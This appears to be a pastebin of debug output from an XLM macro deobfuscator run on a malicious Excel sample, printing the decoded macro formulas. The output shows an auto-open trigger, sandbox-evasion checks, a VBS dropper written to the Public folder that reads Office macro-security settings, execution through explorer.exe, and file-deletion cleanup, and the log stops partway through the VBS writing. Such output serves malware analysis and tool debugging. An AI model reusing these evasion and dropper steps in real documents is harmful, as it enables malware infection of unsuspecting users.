dissectmalware

Sample - XLM - Bug Fixing

Aug 16th, 2020
  1. #
  2.  
  3. C:\Users\user\AppData\Local\Programs\Python\Python38\python.exe "C:\Program Files\JetBrains\PyCharm 2020.2\plugins\python\helpers\pydev\pydevd.py" --multiproc --qt-support=auto --client 127.0.0.1 --port 50320 --file C:/Users/user/Documents/GitHub/XLMMacroDeobfuscator/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\samples\e778ee0ac55131192b71a180e55df087b4523143dd0eb80c8df95d98b80f3715.xls -n
  4. pydev debugger: process 8820 is connecting
  5.  
  6. Connected to pydev debugger (build 202.6397.98)
  7. pywin32 is not installed (only is required if you want to use MS Excel)
  8.  
  9. _ _______
  10. |\ /|( \ ( )
  11. ( \ / )| ( | () () |
  12. \ (_) / | | | || || |
  13. ) _ ( | | | |(_)| |
  14. / ( ) \ | | | | | |
  15. ( / \ )| (____/\| ) ( |
  16. |/ \|(_______/|/ \|
  17. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  18. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  19. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  20. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  21. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  22. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  23. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  24. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  25.  
  26.  
  27. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  28.  
  29. File: C:\Users\user\Downloads\samples\e778ee0ac55131192b71a180e55df087b4523143dd0eb80c8df95d98b80f3715.xls
  30.  
  31. Unencrypted xls file
  32.  
  33. [Loading Cells]
  34. auto_open: auto_open->BgGIL5lfRvUbzqcAWl!$CP$4895
  35. [Starting Deobfuscation]
  36. CELL:CP4895 , FullEvaluation , FORMULA("=CHAR(R[7373]C[-182])",BgGIL5lfRvUbzqcAWl$HG$24283:$HG$24364)
  37. CELL:CP4896 , FullEvaluation , "=FORMULA(R[-27647]C[-79],R[-24110]C[-93])"
  38. CELL:CP4897 , FullEvaluation , "=FORMULA(R[-42080]C[99],R[-25495]C[-44])"
  39. CELL:CP4898 , FullEvaluation , "=FORMULA(R[-34221]C[204],R[-30800]C[129])"
  40. CELL:CP4899 , FullEvaluation , ON.TIME(2020-08-16 06:09:32.742156,'BgGIL5lfRvUbzqcAWl'!EY31295)
  41. CELL:EY31295 , FullEvaluation , "=CLOSE(FALSE)"
  42. CELL:EY31296 , FullEvaluation , "=LEN(APP.MAXIMIZE())+140"
  43. CELL:EY31297 , FullEvaluation , "=LEN(GET.WINDOW(7))+-960"
  44. CELL:EY31298 , FullEvaluation , "=LEN(GET.WINDOW(20))+-58"
  45. CELL:EY31299 , FullEvaluation , "=LEN(GET.WINDOW(23)=3)+-671"
  46. CELL:EY31300 , FullEvaluation , "=LEN(GET.WORKSPACE(31))+-547"
  47. CELL:EY31301 , FullEvaluation , "=LEN(GET.WORKSPACE(13)>770)+-736"
  48. CELL:EY31302 , FullEvaluation , "=LEN(GET.WORKSPACE(14)>390)+-191"
  49. CELL:EY31303 , FullEvaluation , "=LEN(GET.WORKSPACE(19))+-718"
  50. CELL:EY31304 , FullEvaluation , "=LEN(GET.WORKSPACE(42))+-245"
  51. CELL:EY31305 , FullEvaluation , "=R34834C141+1022"
  52. CELL:EY31306 , FullEvaluation , "=R34839C141+297"
  53. CELL:EY31307 , FullEvaluation , "=R34833C141+-56"
  54. CELL:EY31308 , FullEvaluation , "=R34833C141+-23"
  55. CELL:EY31309 , FullEvaluation , "=R34837C141+617"
  56. CELL:EY31310 , FullEvaluation , "=R34833C141+-57"
  57. CELL:EY31311 , FullEvaluation , "=R34839C141+269"
  58. CELL:EY31312 , FullEvaluation , "=R34839C141+237"
  59. CELL:EY31313 , FullEvaluation , "=R34839C141+257"
  60. CELL:EY31314 , FullEvaluation , "=R34841C141+320"
  61. CELL:EY31315 , FullEvaluation , "=R34840C141+811"
  62. CELL:EY31316 , FullEvaluation , "=R34840C141+779"
  63. CELL:EY31317 , FullEvaluation , "=R34833C141+-40"
  64. CELL:EY31318 , FullEvaluation , "=R34834C141+1069"
  65. CELL:EY31319 , FullEvaluation , "=R34836C141+762"
  66. CELL:EY31320 , FullEvaluation , "=R34840C141+799"
  67. CELL:EY31321 , FullEvaluation , "=R34839C141+267"
  68. CELL:EY31322 , FullEvaluation , "=R34834C141+995"
  69. CELL:EY31323 , FullEvaluation , "=R34835C141+107"
  70. CELL:EY31324 , FullEvaluation , "=R34841C141+346"
  71. CELL:EY31325 , FullEvaluation , "=R34835C141+157"
  72. CELL:EY31326 , FullEvaluation , "=R34838C141+777"
  73. CELL:EY31327 , FullEvaluation , "=R34833C141+-78"
  74. CELL:EY31328 , FullEvaluation , "=R34841C141+310"
  75. CELL:EY31329 , FullEvaluation , "=R34835C141+138"
  76. CELL:EY31330 , FullEvaluation , "=R34841C141+357"
  77. CELL:EY31331 , FullEvaluation , "=R34837C141+653"
  78. CELL:EY31332 , FullEvaluation , "=R34835C141+145"
  79. CELL:EY31333 , FullEvaluation , "=R34835C141+111"
  80. CELL:EY31334 , FullEvaluation , "=R34833C141+-37"
  81. CELL:EY31335 , FullEvaluation , "=R34839C141+260"
  82. CELL:EY31336 , FullEvaluation , "=R34836C141+780"
  83. CELL:EY31337 , FullEvaluation , "=R34837C141+588"
  84. CELL:EY31338 , FullEvaluation , "=R34833C141+-43"
  85. CELL:EY31339 , FullEvaluation , "=R34838C141+781"
  86. CELL:EY31340 , FullEvaluation , "=R34833C141+-27"
  87. CELL:EY31341 , FullEvaluation , "=R34841C141+300"
  88. CELL:EY31342 , FullEvaluation , "=R34840C141+790"
  89. CELL:EY31343 , FullEvaluation , "=R34833C141+-96"
  90. CELL:EY31344 , FullEvaluation , "=R34836C141+710"
  91. CELL:EY31345 , FullEvaluation , "=R34835C141+156"
  92. CELL:EY31346 , FullEvaluation , "=R34835C141+92"
  93. CELL:EY31347 , FullEvaluation , "=R34840C141+746"
  94. CELL:EY31348 , FullEvaluation , "=R34838C141+854"
  95. CELL:EY31349 , FullEvaluation , "=R34841C141+319"
  96. CELL:EY31350 , FullEvaluation , "=R34836C141+757"
  97. CELL:EY31351 , FullEvaluation , "=R34838C141+830"
  98. CELL:EY31352 , FullEvaluation , "=R34837C141+600"
  99. CELL:EY31353 , FullEvaluation , "=R34839C141+299"
  100. CELL:EY31354 , FullEvaluation , "=R34835C141+140"
  101. CELL:EY31355 , FullEvaluation , "=R34838C141+847"
  102. CELL:EY31356 , FullEvaluation , "=R34838C141+809"
  103. CELL:EY31357 , FullEvaluation , "=R34834C141+1038"
  104. CELL:EY31358 , FullEvaluation , "=R34836C141+739"
  105. CELL:EY31359 , FullEvaluation , "=R34839C141+306"
  106. CELL:EY31360 , FullEvaluation , "=R34837C141+594"
  107. CELL:EY31361 , FullEvaluation , "=R34839C141+255"
  108. CELL:EY31362 , FullEvaluation , "=R34834C141+1006"
  109. CELL:EY31363 , FullEvaluation , "=R34840C141+776"
  110. CELL:EY31364 , FullEvaluation , "=R34838C141+813"
  111. CELL:EY31365 , FullEvaluation , "=R34837C141+642"
  112. CELL:EY31366 , FullEvaluation , "=R34836C141+776"
  113. CELL:EY31367 , FullEvaluation , "=R34836C141+775"
  114. CELL:EY31368 , FullEvaluation , "=R34839C141+261"
  115. CELL:EY31369 , FullEvaluation , "=R34835C141+88"
  116. CELL:EY31370 , FullEvaluation , "=R34837C141+641"
  117. CELL:EY31371 , FullEvaluation , "=R34835C141+101"
  118. CELL:EY31372 , FullEvaluation , "=R34841C141+280"
  119. CELL:EY31373 , FullEvaluation , "=R34838C141+824"
  120. CELL:EY31374 , FullEvaluation , "=R34836C141+773"
  121. CELL:EY31375 , FullEvaluation , "=R34840C141+769"
  122. CELL:EY31376 , FullEvaluation , "=R34841C141+282"
  123. CELL:EY31377 , FullEvaluation , "=R34833C141+-26"
  124. CELL:EY31378 , FullEvaluation , "=R34841C141+285"
  125. CELL:EY31379 , FullEvaluation , "=R34838C141+852"
  126. CELL:EY31380 , FullEvaluation , "=R34841C141+312"
  127. CELL:EY31381 , FullEvaluation , "=R34840C141+768"
  128. CELL:EY31382 , FullEvaluation , "=R34837C141+602"
  129. CELL:EY31383 , FullEvaluation , "=R34841C141+334"
  130. CELL:EY31384 , FullEvaluation , "=R34840C141+803"
  131. CELL:EY31385 , FullEvaluation , "=R34835C141+110"
  132. CELL:EY31386 , FullEvaluation , "=R34841C141+302"
  133. CELL:EY31387 , FullEvaluation , "=FORMULA.FILL(""=CHAR(R[30246]C[-23])"",R4596C164:R4677C164)"
  134. CELL:EY31388 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R34832C141))"
  135. CELL:EY31389 , FullEvaluation , "=""C:\Users\Public\Bcy75IXg.vbs"""
  136. CELL:EY31390 , FullEvaluation , "=""C:\Users\Public\h9W.txt"""
  137. CELL:EY31391 , FullEvaluation , "=FOPEN(R34926C141,3)"
  138. CELL:EY31392 , FullEvaluation , "=FWRITELN(R34928C141,""On Error Resume Next"")"
  139. CELL:EY31393 , FullEvaluation , "=FWRITELN(R34928C141,""Set ggLxt = CreateObject(""""WScript.Shell"""")"")"
  140. CELL:EY31394 , FullEvaluation , "=FWRITELN(R34928C141,""Set JJ0Vlx = CreateObject(""""Scripting.FileSystemObject"""")"")"
  141. CELL:EY31395 , FullEvaluation , "=FWRITELN(R34928C141,""Set KEPJk = JJ0Vlx.CreateTextFile(""""""&R34927C141&"""""", True)"")"
  142. CELL:EY31396 , FullEvaluation , "=FWRITELN(R34928C141,""KEPJk.WriteLine(ggLxt.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  143. CELL:EY31397 , FullEvaluation , "=FWRITELN(R34928C141,""KEPJk.Close"")"
  144. CELL:EY31398 , FullEvaluation , "=FCLOSE(R34928C141)"
  145. CELL:EY31399 , FullEvaluation , "=EXEC(""explorer.exe ""&R34926C141&"""")"
  146. CELL:EY31400 , FullEvaluation , "=WHILE(ISERROR(FILES(R34927C141)))"
  147. CELL:EY31401 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  148. CELL:EY31402 , FullEvaluation , "=NEXT()"
  149. CELL:EY31403 , FullEvaluation , "=FILE.DELETE(R34926C141)"
  150. CELL:EY31404 , FullEvaluation , "=FOPEN(R34927C141,2)"
  151. CELL:EY31405 , FullEvaluation , "=FREAD(R34941C141,100)"
  152. CELL:EY31406 , FullEvaluation , "=FCLOSE(R34941C141)"
  153. CELL:EY31407 , FullEvaluation , "=FILE.DELETE(R34927C141)"
  154. CELL:EY31408 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R34942C141)),GOTO(R34832C141),)"
  155. CELL:EY31409 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))"
  156. CELL:EY31410 , FullEvaluation , ON.TIME(2020-08-16 06:09:33.175459,'BgGIL5lfRvUbzqcAWl'!HZ58941)
  157. CELL:HZ58941 , FullEvaluation , FORMULA("=FORMULA(R[-27647]C[-79],R[-24110]C[-93])",BgGIL5lfRvUbzqcAWl$HZ$58942:$HZ$59056)
  158. CELL:HZ58942 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-24110]C[-93])
  159. CELL:HZ58943 , FullEvaluation , FORMULA("=LEN(APP.MAXIMIZE())+140",R[-24110]C[-93])
  160. CELL:HZ58944 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(7))+-960",R[-24110]C[-93])
  161. CELL:HZ58945 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(20))+-58",R[-24110]C[-93])
  162. CELL:HZ58946 , FullEvaluation , FORMULA("=LEN(GET.WINDOW(23)=3)+-671",R[-24110]C[-93])
  163. CELL:HZ58947 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(31))+-547",R[-24110]C[-93])
  164. CELL:HZ58948 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(13)>770)+-736",R[-24110]C[-93])
  165. CELL:HZ58949 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(14)>390)+-191",R[-24110]C[-93])
  166. CELL:HZ58950 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(19))+-718",R[-24110]C[-93])
  167. CELL:HZ58951 , FullEvaluation , FORMULA("=LEN(GET.WORKSPACE(42))+-245",R[-24110]C[-93])
  168. CELL:HZ58952 , FullEvaluation , FORMULA("=R34834C141+1022",R[-24110]C[-93])
  169. CELL:HZ58953 , FullEvaluation , FORMULA("=R34839C141+297",R[-24110]C[-93])
  170. CELL:HZ58954 , FullEvaluation , FORMULA("=R34833C141+-56",R[-24110]C[-93])
  171. CELL:HZ58955 , FullEvaluation , FORMULA("=R34833C141+-23",R[-24110]C[-93])
  172. CELL:HZ58956 , FullEvaluation , FORMULA("=R34837C141+617",R[-24110]C[-93])
  173. CELL:HZ58957 , FullEvaluation , FORMULA("=R34833C141+-57",R[-24110]C[-93])
  174. CELL:HZ58958 , FullEvaluation , FORMULA("=R34839C141+269",R[-24110]C[-93])
  175. CELL:HZ58959 , FullEvaluation , FORMULA("=R34839C141+237",R[-24110]C[-93])
  176. CELL:HZ58960 , FullEvaluation , FORMULA("=R34839C141+257",R[-24110]C[-93])
  177. CELL:HZ58961 , FullEvaluation , FORMULA("=R34841C141+320",R[-24110]C[-93])
  178. CELL:HZ58962 , FullEvaluation , FORMULA("=R34840C141+811",R[-24110]C[-93])
  179. CELL:HZ58963 , FullEvaluation , FORMULA("=R34840C141+779",R[-24110]C[-93])
  180. CELL:HZ58964 , FullEvaluation , FORMULA("=R34833C141+-40",R[-24110]C[-93])
  181. CELL:HZ58965 , FullEvaluation , FORMULA("=R34834C141+1069",R[-24110]C[-93])
  182. CELL:HZ58966 , FullEvaluation , FORMULA("=R34836C141+762",R[-24110]C[-93])
  183. CELL:HZ58967 , FullEvaluation , FORMULA("=R34840C141+799",R[-24110]C[-93])
  184. CELL:HZ58968 , FullEvaluation , FORMULA("=R34839C141+267",R[-24110]C[-93])
  185. CELL:HZ58969 , FullEvaluation , FORMULA("=R34834C141+995",R[-24110]C[-93])
  186. CELL:HZ58970 , FullEvaluation , FORMULA("=R34835C141+107",R[-24110]C[-93])
  187. CELL:HZ58971 , FullEvaluation , FORMULA("=R34841C141+346",R[-24110]C[-93])
  188. CELL:HZ58972 , FullEvaluation , FORMULA("=R34835C141+157",R[-24110]C[-93])
  189. CELL:HZ58973 , FullEvaluation , FORMULA("=R34838C141+777",R[-24110]C[-93])
  190. CELL:HZ58974 , FullEvaluation , FORMULA("=R34833C141+-78",R[-24110]C[-93])
  191. CELL:HZ58975 , FullEvaluation , FORMULA("=R34841C141+310",R[-24110]C[-93])
  192. CELL:HZ58976 , FullEvaluation , FORMULA("=R34835C141+138",R[-24110]C[-93])
  193. CELL:HZ58977 , FullEvaluation , FORMULA("=R34841C141+357",R[-24110]C[-93])
  194. CELL:HZ58978 , FullEvaluation , FORMULA("=R34837C141+653",R[-24110]C[-93])
  195. CELL:HZ58979 , FullEvaluation , FORMULA("=R34835C141+145",R[-24110]C[-93])
  196. CELL:HZ58980 , FullEvaluation , FORMULA("=R34835C141+111",R[-24110]C[-93])
  197. CELL:HZ58981 , FullEvaluation , FORMULA("=R34833C141+-37",R[-24110]C[-93])
  198. CELL:HZ58982 , FullEvaluation , FORMULA("=R34839C141+260",R[-24110]C[-93])
  199. CELL:HZ58983 , FullEvaluation , FORMULA("=R34836C141+780",R[-24110]C[-93])
  200. CELL:HZ58984 , FullEvaluation , FORMULA("=R34837C141+588",R[-24110]C[-93])
  201. CELL:HZ58985 , FullEvaluation , FORMULA("=R34833C141+-43",R[-24110]C[-93])
  202. CELL:HZ58986 , FullEvaluation , FORMULA("=R34838C141+781",R[-24110]C[-93])
  203. CELL:HZ58987 , FullEvaluation , FORMULA("=R34833C141+-27",R[-24110]C[-93])
  204. CELL:HZ58988 , FullEvaluation , FORMULA("=R34841C141+300",R[-24110]C[-93])
  205. CELL:HZ58989 , FullEvaluation , FORMULA("=R34840C141+790",R[-24110]C[-93])
  206. CELL:HZ58990 , FullEvaluation , FORMULA("=R34833C141+-96",R[-24110]C[-93])
  207. CELL:HZ58991 , FullEvaluation , FORMULA("=R34836C141+710",R[-24110]C[-93])
  208. CELL:HZ58992 , FullEvaluation , FORMULA("=R34835C141+156",R[-24110]C[-93])
  209. CELL:HZ58993 , FullEvaluation , FORMULA("=R34835C141+92",R[-24110]C[-93])
  210. CELL:HZ58994 , FullEvaluation , FORMULA("=R34840C141+746",R[-24110]C[-93])
  211. CELL:HZ58995 , FullEvaluation , FORMULA("=R34838C141+854",R[-24110]C[-93])
  212. CELL:HZ58996 , FullEvaluation , FORMULA("=R34841C141+319",R[-24110]C[-93])
  213. CELL:HZ58997 , FullEvaluation , FORMULA("=R34836C141+757",R[-24110]C[-93])
  214. CELL:HZ58998 , FullEvaluation , FORMULA("=R34838C141+830",R[-24110]C[-93])
  215. CELL:HZ58999 , FullEvaluation , FORMULA("=R34837C141+600",R[-24110]C[-93])
  216. CELL:HZ59000 , FullEvaluation , FORMULA("=R34839C141+299",R[-24110]C[-93])
  217. CELL:HZ59001 , FullEvaluation , FORMULA("=R34835C141+140",R[-24110]C[-93])
  218. CELL:HZ59002 , FullEvaluation , FORMULA("=R34838C141+847",R[-24110]C[-93])
  219. CELL:HZ59003 , FullEvaluation , FORMULA("=R34838C141+809",R[-24110]C[-93])
  220. CELL:HZ59004 , FullEvaluation , FORMULA("=R34834C141+1038",R[-24110]C[-93])
  221. CELL:HZ59005 , FullEvaluation , FORMULA("=R34836C141+739",R[-24110]C[-93])
  222. CELL:HZ59006 , FullEvaluation , FORMULA("=R34839C141+306",R[-24110]C[-93])
  223. CELL:HZ59007 , FullEvaluation , FORMULA("=R34837C141+594",R[-24110]C[-93])
  224. CELL:HZ59008 , FullEvaluation , FORMULA("=R34839C141+255",R[-24110]C[-93])
  225. CELL:HZ59009 , FullEvaluation , FORMULA("=R34834C141+1006",R[-24110]C[-93])
  226. CELL:HZ59010 , FullEvaluation , FORMULA("=R34840C141+776",R[-24110]C[-93])
  227. CELL:HZ59011 , FullEvaluation , FORMULA("=R34838C141+813",R[-24110]C[-93])
  228. CELL:HZ59012 , FullEvaluation , FORMULA("=R34837C141+642",R[-24110]C[-93])
  229. CELL:HZ59013 , FullEvaluation , FORMULA("=R34836C141+776",R[-24110]C[-93])
  230. CELL:HZ59014 , FullEvaluation , FORMULA("=R34836C141+775",R[-24110]C[-93])
  231. CELL:HZ59015 , FullEvaluation , FORMULA("=R34839C141+261",R[-24110]C[-93])
  232. CELL:HZ59016 , FullEvaluation , FORMULA("=R34835C141+88",R[-24110]C[-93])
  233. CELL:HZ59017 , FullEvaluation , FORMULA("=R34837C141+641",R[-24110]C[-93])
  234. CELL:HZ59018 , FullEvaluation , FORMULA("=R34835C141+101",R[-24110]C[-93])
  235. CELL:HZ59019 , FullEvaluation , FORMULA("=R34841C141+280",R[-24110]C[-93])
  236. CELL:HZ59020 , FullEvaluation , FORMULA("=R34838C141+824",R[-24110]C[-93])
  237. CELL:HZ59021 , FullEvaluation , FORMULA("=R34836C141+773",R[-24110]C[-93])
  238. CELL:HZ59022 , FullEvaluation , FORMULA("=R34840C141+769",R[-24110]C[-93])
  239. CELL:HZ59023 , FullEvaluation , FORMULA("=R34841C141+282",R[-24110]C[-93])
  240. CELL:HZ59024 , FullEvaluation , FORMULA("=R34833C141+-26",R[-24110]C[-93])
  241. CELL:HZ59025 , FullEvaluation , FORMULA("=R34841C141+285",R[-24110]C[-93])
  242. CELL:HZ59026 , FullEvaluation , FORMULA("=R34838C141+852",R[-24110]C[-93])
  243. CELL:HZ59027 , FullEvaluation , FORMULA("=R34841C141+312",R[-24110]C[-93])
  244. CELL:HZ59028 , FullEvaluation , FORMULA("=R34840C141+768",R[-24110]C[-93])
  245. CELL:HZ59029 , FullEvaluation , FORMULA("=R34837C141+602",R[-24110]C[-93])
  246. CELL:HZ59030 , FullEvaluation , FORMULA("=R34841C141+334",R[-24110]C[-93])
  247. CELL:HZ59031 , FullEvaluation , FORMULA("=R34840C141+803",R[-24110]C[-93])
  248. CELL:HZ59032 , FullEvaluation , FORMULA("=R34835C141+110",R[-24110]C[-93])
  249. CELL:HZ59033 , FullEvaluation , FORMULA("=R34841C141+302",R[-24110]C[-93])
  250. CELL:HZ59034 , FullEvaluation , FORMULA("=FORMULA.FILL(""=CHAR(R[30246]C[-23])"",R4596C164:R4677C164)",R[-24110]C[-93])
  251. CELL:HZ59035 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R34832C141))",R[-24110]C[-93])
  252. CELL:HZ59036 , FullEvaluation , FORMULA("=""C:\Users\Public\Bcy75IXg.vbs""",R[-24110]C[-93])
  253. CELL:HZ59037 , FullEvaluation , FORMULA("=""C:\Users\Public\h9W.txt""",R[-24110]C[-93])
  254. CELL:HZ59038 , FullEvaluation , FORMULA("=FOPEN(R34926C141,3)",R[-24110]C[-93])
  255. CELL:HZ59039 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""On Error Resume Next"")",R[-24110]C[-93])
  256. CELL:HZ59040 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set ggLxt = CreateObject(""""WScript.Shell"""")"")",R[-24110]C[-93])
  257. CELL:HZ59041 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set JJ0Vlx = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-24110]C[-93])
  258. CELL:HZ59042 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""Set KEPJk = JJ0Vlx.CreateTextFile(""""""&R34927C141&"""""", True)"")",R[-24110]C[-93])
  259. CELL:HZ59043 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""KEPJk.WriteLine(ggLxt.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-24110]C[-93])
  260. CELL:HZ59044 , FullEvaluation , FORMULA("=FWRITELN(R34928C141,""KEPJk.Close"")",R[-24110]C[-93])
  261. CELL:HZ59045 , FullEvaluation , FORMULA("=FCLOSE(R34928C141)",R[-24110]C[-93])
  262. CELL:HZ59046 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R34926C141&"""")",R[-24110]C[-93])
  263. CELL:HZ59047 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R34927C141)))",R[-24110]C[-93])
  264. CELL:HZ59048 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-24110]C[-93])
  265. CELL:HZ59049 , FullEvaluation , FORMULA("=NEXT()",R[-24110]C[-93])
  266. CELL:HZ59050 , FullEvaluation , FORMULA("=FILE.DELETE(R34926C141)",R[-24110]C[-93])
  267. CELL:HZ59051 , FullEvaluation , FORMULA("=FOPEN(R34927C141,2)",R[-24110]C[-93])
  268. CELL:HZ59052 , FullEvaluation , FORMULA("=FREAD(R34941C141,100)",R[-24110]C[-93])
  269. CELL:HZ59053 , FullEvaluation , FORMULA("=FCLOSE(R34941C141)",R[-24110]C[-93])
  270. CELL:HZ59054 , FullEvaluation , FORMULA("=FILE.DELETE(R34927C141)",R[-24110]C[-93])
  271. CELL:HZ59055 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R34942C141)),GOTO(R34832C141),)",R[-24110]C[-93])
  272. CELL:HZ59056 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R19560C173),GOTO(R24369C231))",R[-24110]C[-93])
  273. CELL:HZ59057 , FullEvaluation , ON.TIME(2020-08-16 06:09:33.276218,'BgGIL5lfRvUbzqcAWl'!EK34833)
  274. CELL:EK34833 , FullEvaluation , 144
  275. CELL:EK34834 , FullEvaluation , -955
  276. CELL:EK34835 , FullEvaluation , -54
  277. CELL:EK34836 , FullEvaluation , -667
  278. CELL:EK34837 , FullEvaluation , -542
  279. CELL:EK34838 , FullEvaluation , -732
  280. CELL:EK34839 , FullEvaluation , -187
  281. CELL:EK34840 , FullEvaluation , -714
  282. CELL:EK34841 , FullEvaluation , -241
  283. CELL:EK34842 , FullEvaluation , 67
  284. CELL:EK34843 , FullEvaluation , 110
  285. CELL:EK34844 , FullEvaluation , 88
  286. CELL:EK34845 , FullEvaluation , 121
  287. CELL:EK34846 , FullEvaluation , 75
  288. CELL:EK34847 , FullEvaluation , 87
  289. CELL:EK34848 , FullEvaluation , 82
  290. CELL:EK34849 , FullEvaluation , 50
  291. CELL:EK34850 , FullEvaluation , 70
  292. CELL:EK34851 , FullEvaluation , 79
  293. CELL:EK34852 , FullEvaluation , 97
  294. CELL:EK34853 , FullEvaluation , 65
  295. CELL:EK34854 , FullEvaluation , 104
  296. CELL:EK34855 , FullEvaluation , 114
  297. CELL:EK34856 , FullEvaluation , 95
  298. CELL:EK34857 , FullEvaluation , 85
  299. CELL:EK34858 , FullEvaluation , 80
  300. CELL:EK34859 , FullEvaluation , 40
  301. CELL:EK34860 , FullEvaluation , 53
  302. CELL:EK34861 , FullEvaluation , 105
  303. CELL:EK34862 , FullEvaluation , 103
  304. CELL:EK34863 , FullEvaluation , 45
  305. CELL:EK34864 , FullEvaluation , 66
  306. CELL:EK34865 , FullEvaluation , 69
  307. CELL:EK34866 , FullEvaluation , 84
  308. CELL:EK34867 , FullEvaluation , 116
  309. CELL:EK34868 , FullEvaluation , 111
  310. CELL:EK34869 , FullEvaluation , 91
  311. CELL:EK34870 , FullEvaluation , 57
  312. CELL:EK34871 , FullEvaluation , 107
  313. CELL:EK34872 , FullEvaluation , 73
  314. CELL:EK34873 , FullEvaluation , 113
  315. CELL:EK34874 , FullEvaluation , 46
  316. CELL:EK34875 , FullEvaluation , 101
  317. CELL:EK34876 , FullEvaluation , 49
  318. CELL:EK34877 , FullEvaluation , 117
  319. CELL:EK34878 , FullEvaluation , 59
  320. CELL:EK34879 , FullEvaluation , 76
  321. CELL:EK34880 , FullEvaluation , 48
  322. CELL:EK34881 , FullEvaluation , 43
  323. CELL:EK34882 , FullEvaluation , 102
  324. CELL:EK34883 , FullEvaluation , 38
  325. CELL:EK34884 , FullEvaluation , 32
  326. CELL:EK34885 , FullEvaluation , 122
  327. CELL:EK34886 , FullEvaluation , 78
  328. CELL:EK34887 , FullEvaluation , 90
  329. CELL:EK34888 , FullEvaluation , 98
  330. CELL:EK34889 , FullEvaluation , 58
  331. CELL:EK34890 , FullEvaluation , 112
  332. CELL:EK34891 , FullEvaluation , 86
  333. CELL:EK34892 , FullEvaluation , 115
  334. CELL:EK34893 , FullEvaluation , 77
  335. CELL:EK34894 , FullEvaluation , 83
  336. CELL:EK34895 , FullEvaluation , 72
  337. CELL:EK34896 , FullEvaluation , 119
  338. CELL:EK34897 , FullEvaluation , 52
  339. CELL:EK34898 , FullEvaluation , 68
  340. CELL:EK34899 , FullEvaluation , 51
  341. CELL:EK34900 , FullEvaluation , 62
  342. CELL:EK34901 , FullEvaluation , 81
  343. CELL:EK34902 , FullEvaluation , 100
  344. CELL:EK34903 , FullEvaluation , 109
  345. CELL:EK34904 , FullEvaluation , 108
  346. CELL:EK34905 , FullEvaluation , 74
  347. CELL:EK34906 , FullEvaluation , 34
  348. CELL:EK34907 , FullEvaluation , 99
  349. CELL:EK34908 , FullEvaluation , 47
  350. CELL:EK34909 , FullEvaluation , 39
  351. CELL:EK34910 , FullEvaluation , 92
  352. CELL:EK34911 , FullEvaluation , 106
  353. CELL:EK34912 , FullEvaluation , 55
  354. CELL:EK34913 , FullEvaluation , 41
  355. CELL:EK34914 , FullEvaluation , 118
  356. CELL:EK34915 , FullEvaluation , 44
  357. CELL:EK34916 , FullEvaluation , 120
  358. CELL:EK34917 , FullEvaluation , 71
  359. CELL:EK34918 , FullEvaluation , 54
  360. CELL:EK34919 , FullEvaluation , 60
  361. CELL:EK34920 , FullEvaluation , 93
  362. CELL:EK34921 , FullEvaluation , 89
  363. CELL:EK34922 , FullEvaluation , 56
  364. CELL:EK34923 , FullEvaluation , 61
  365. CELL:EK34924 , FullEvaluation , FORMULA("=CHAR(R[30246]C[-23])",R4596C164:R4677C164)
  366. CELL:EK34925 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R34832C141))
  367. CELL:EK34925 , FullEvaluation , [TRUE]
  368. CELL:EK34926 , FullEvaluation , "C:\Users\Public\Bcy75IXg.vbs"
  369. CELL:EK34927 , FullEvaluation , "C:\Users\Public\h9W.txt"
  370. CELL:EK34928 , FullEvaluation , FOPEN("C:\Users\Public\Bcy75IXg.vbs",3)
  371. CELL:EK34929 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","On Error Resume Next")
  372. CELL:EK34930 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set ggLxt = CreateObject(""WScript.Shell"")")
  373. CELL:EK34931 , FullEvaluation , FWRITE("C:\Users\Public\Bcy75IXg.vbs","Set JJ0Vlx = CreateObject(""Scripting.FileSystemObject"")")
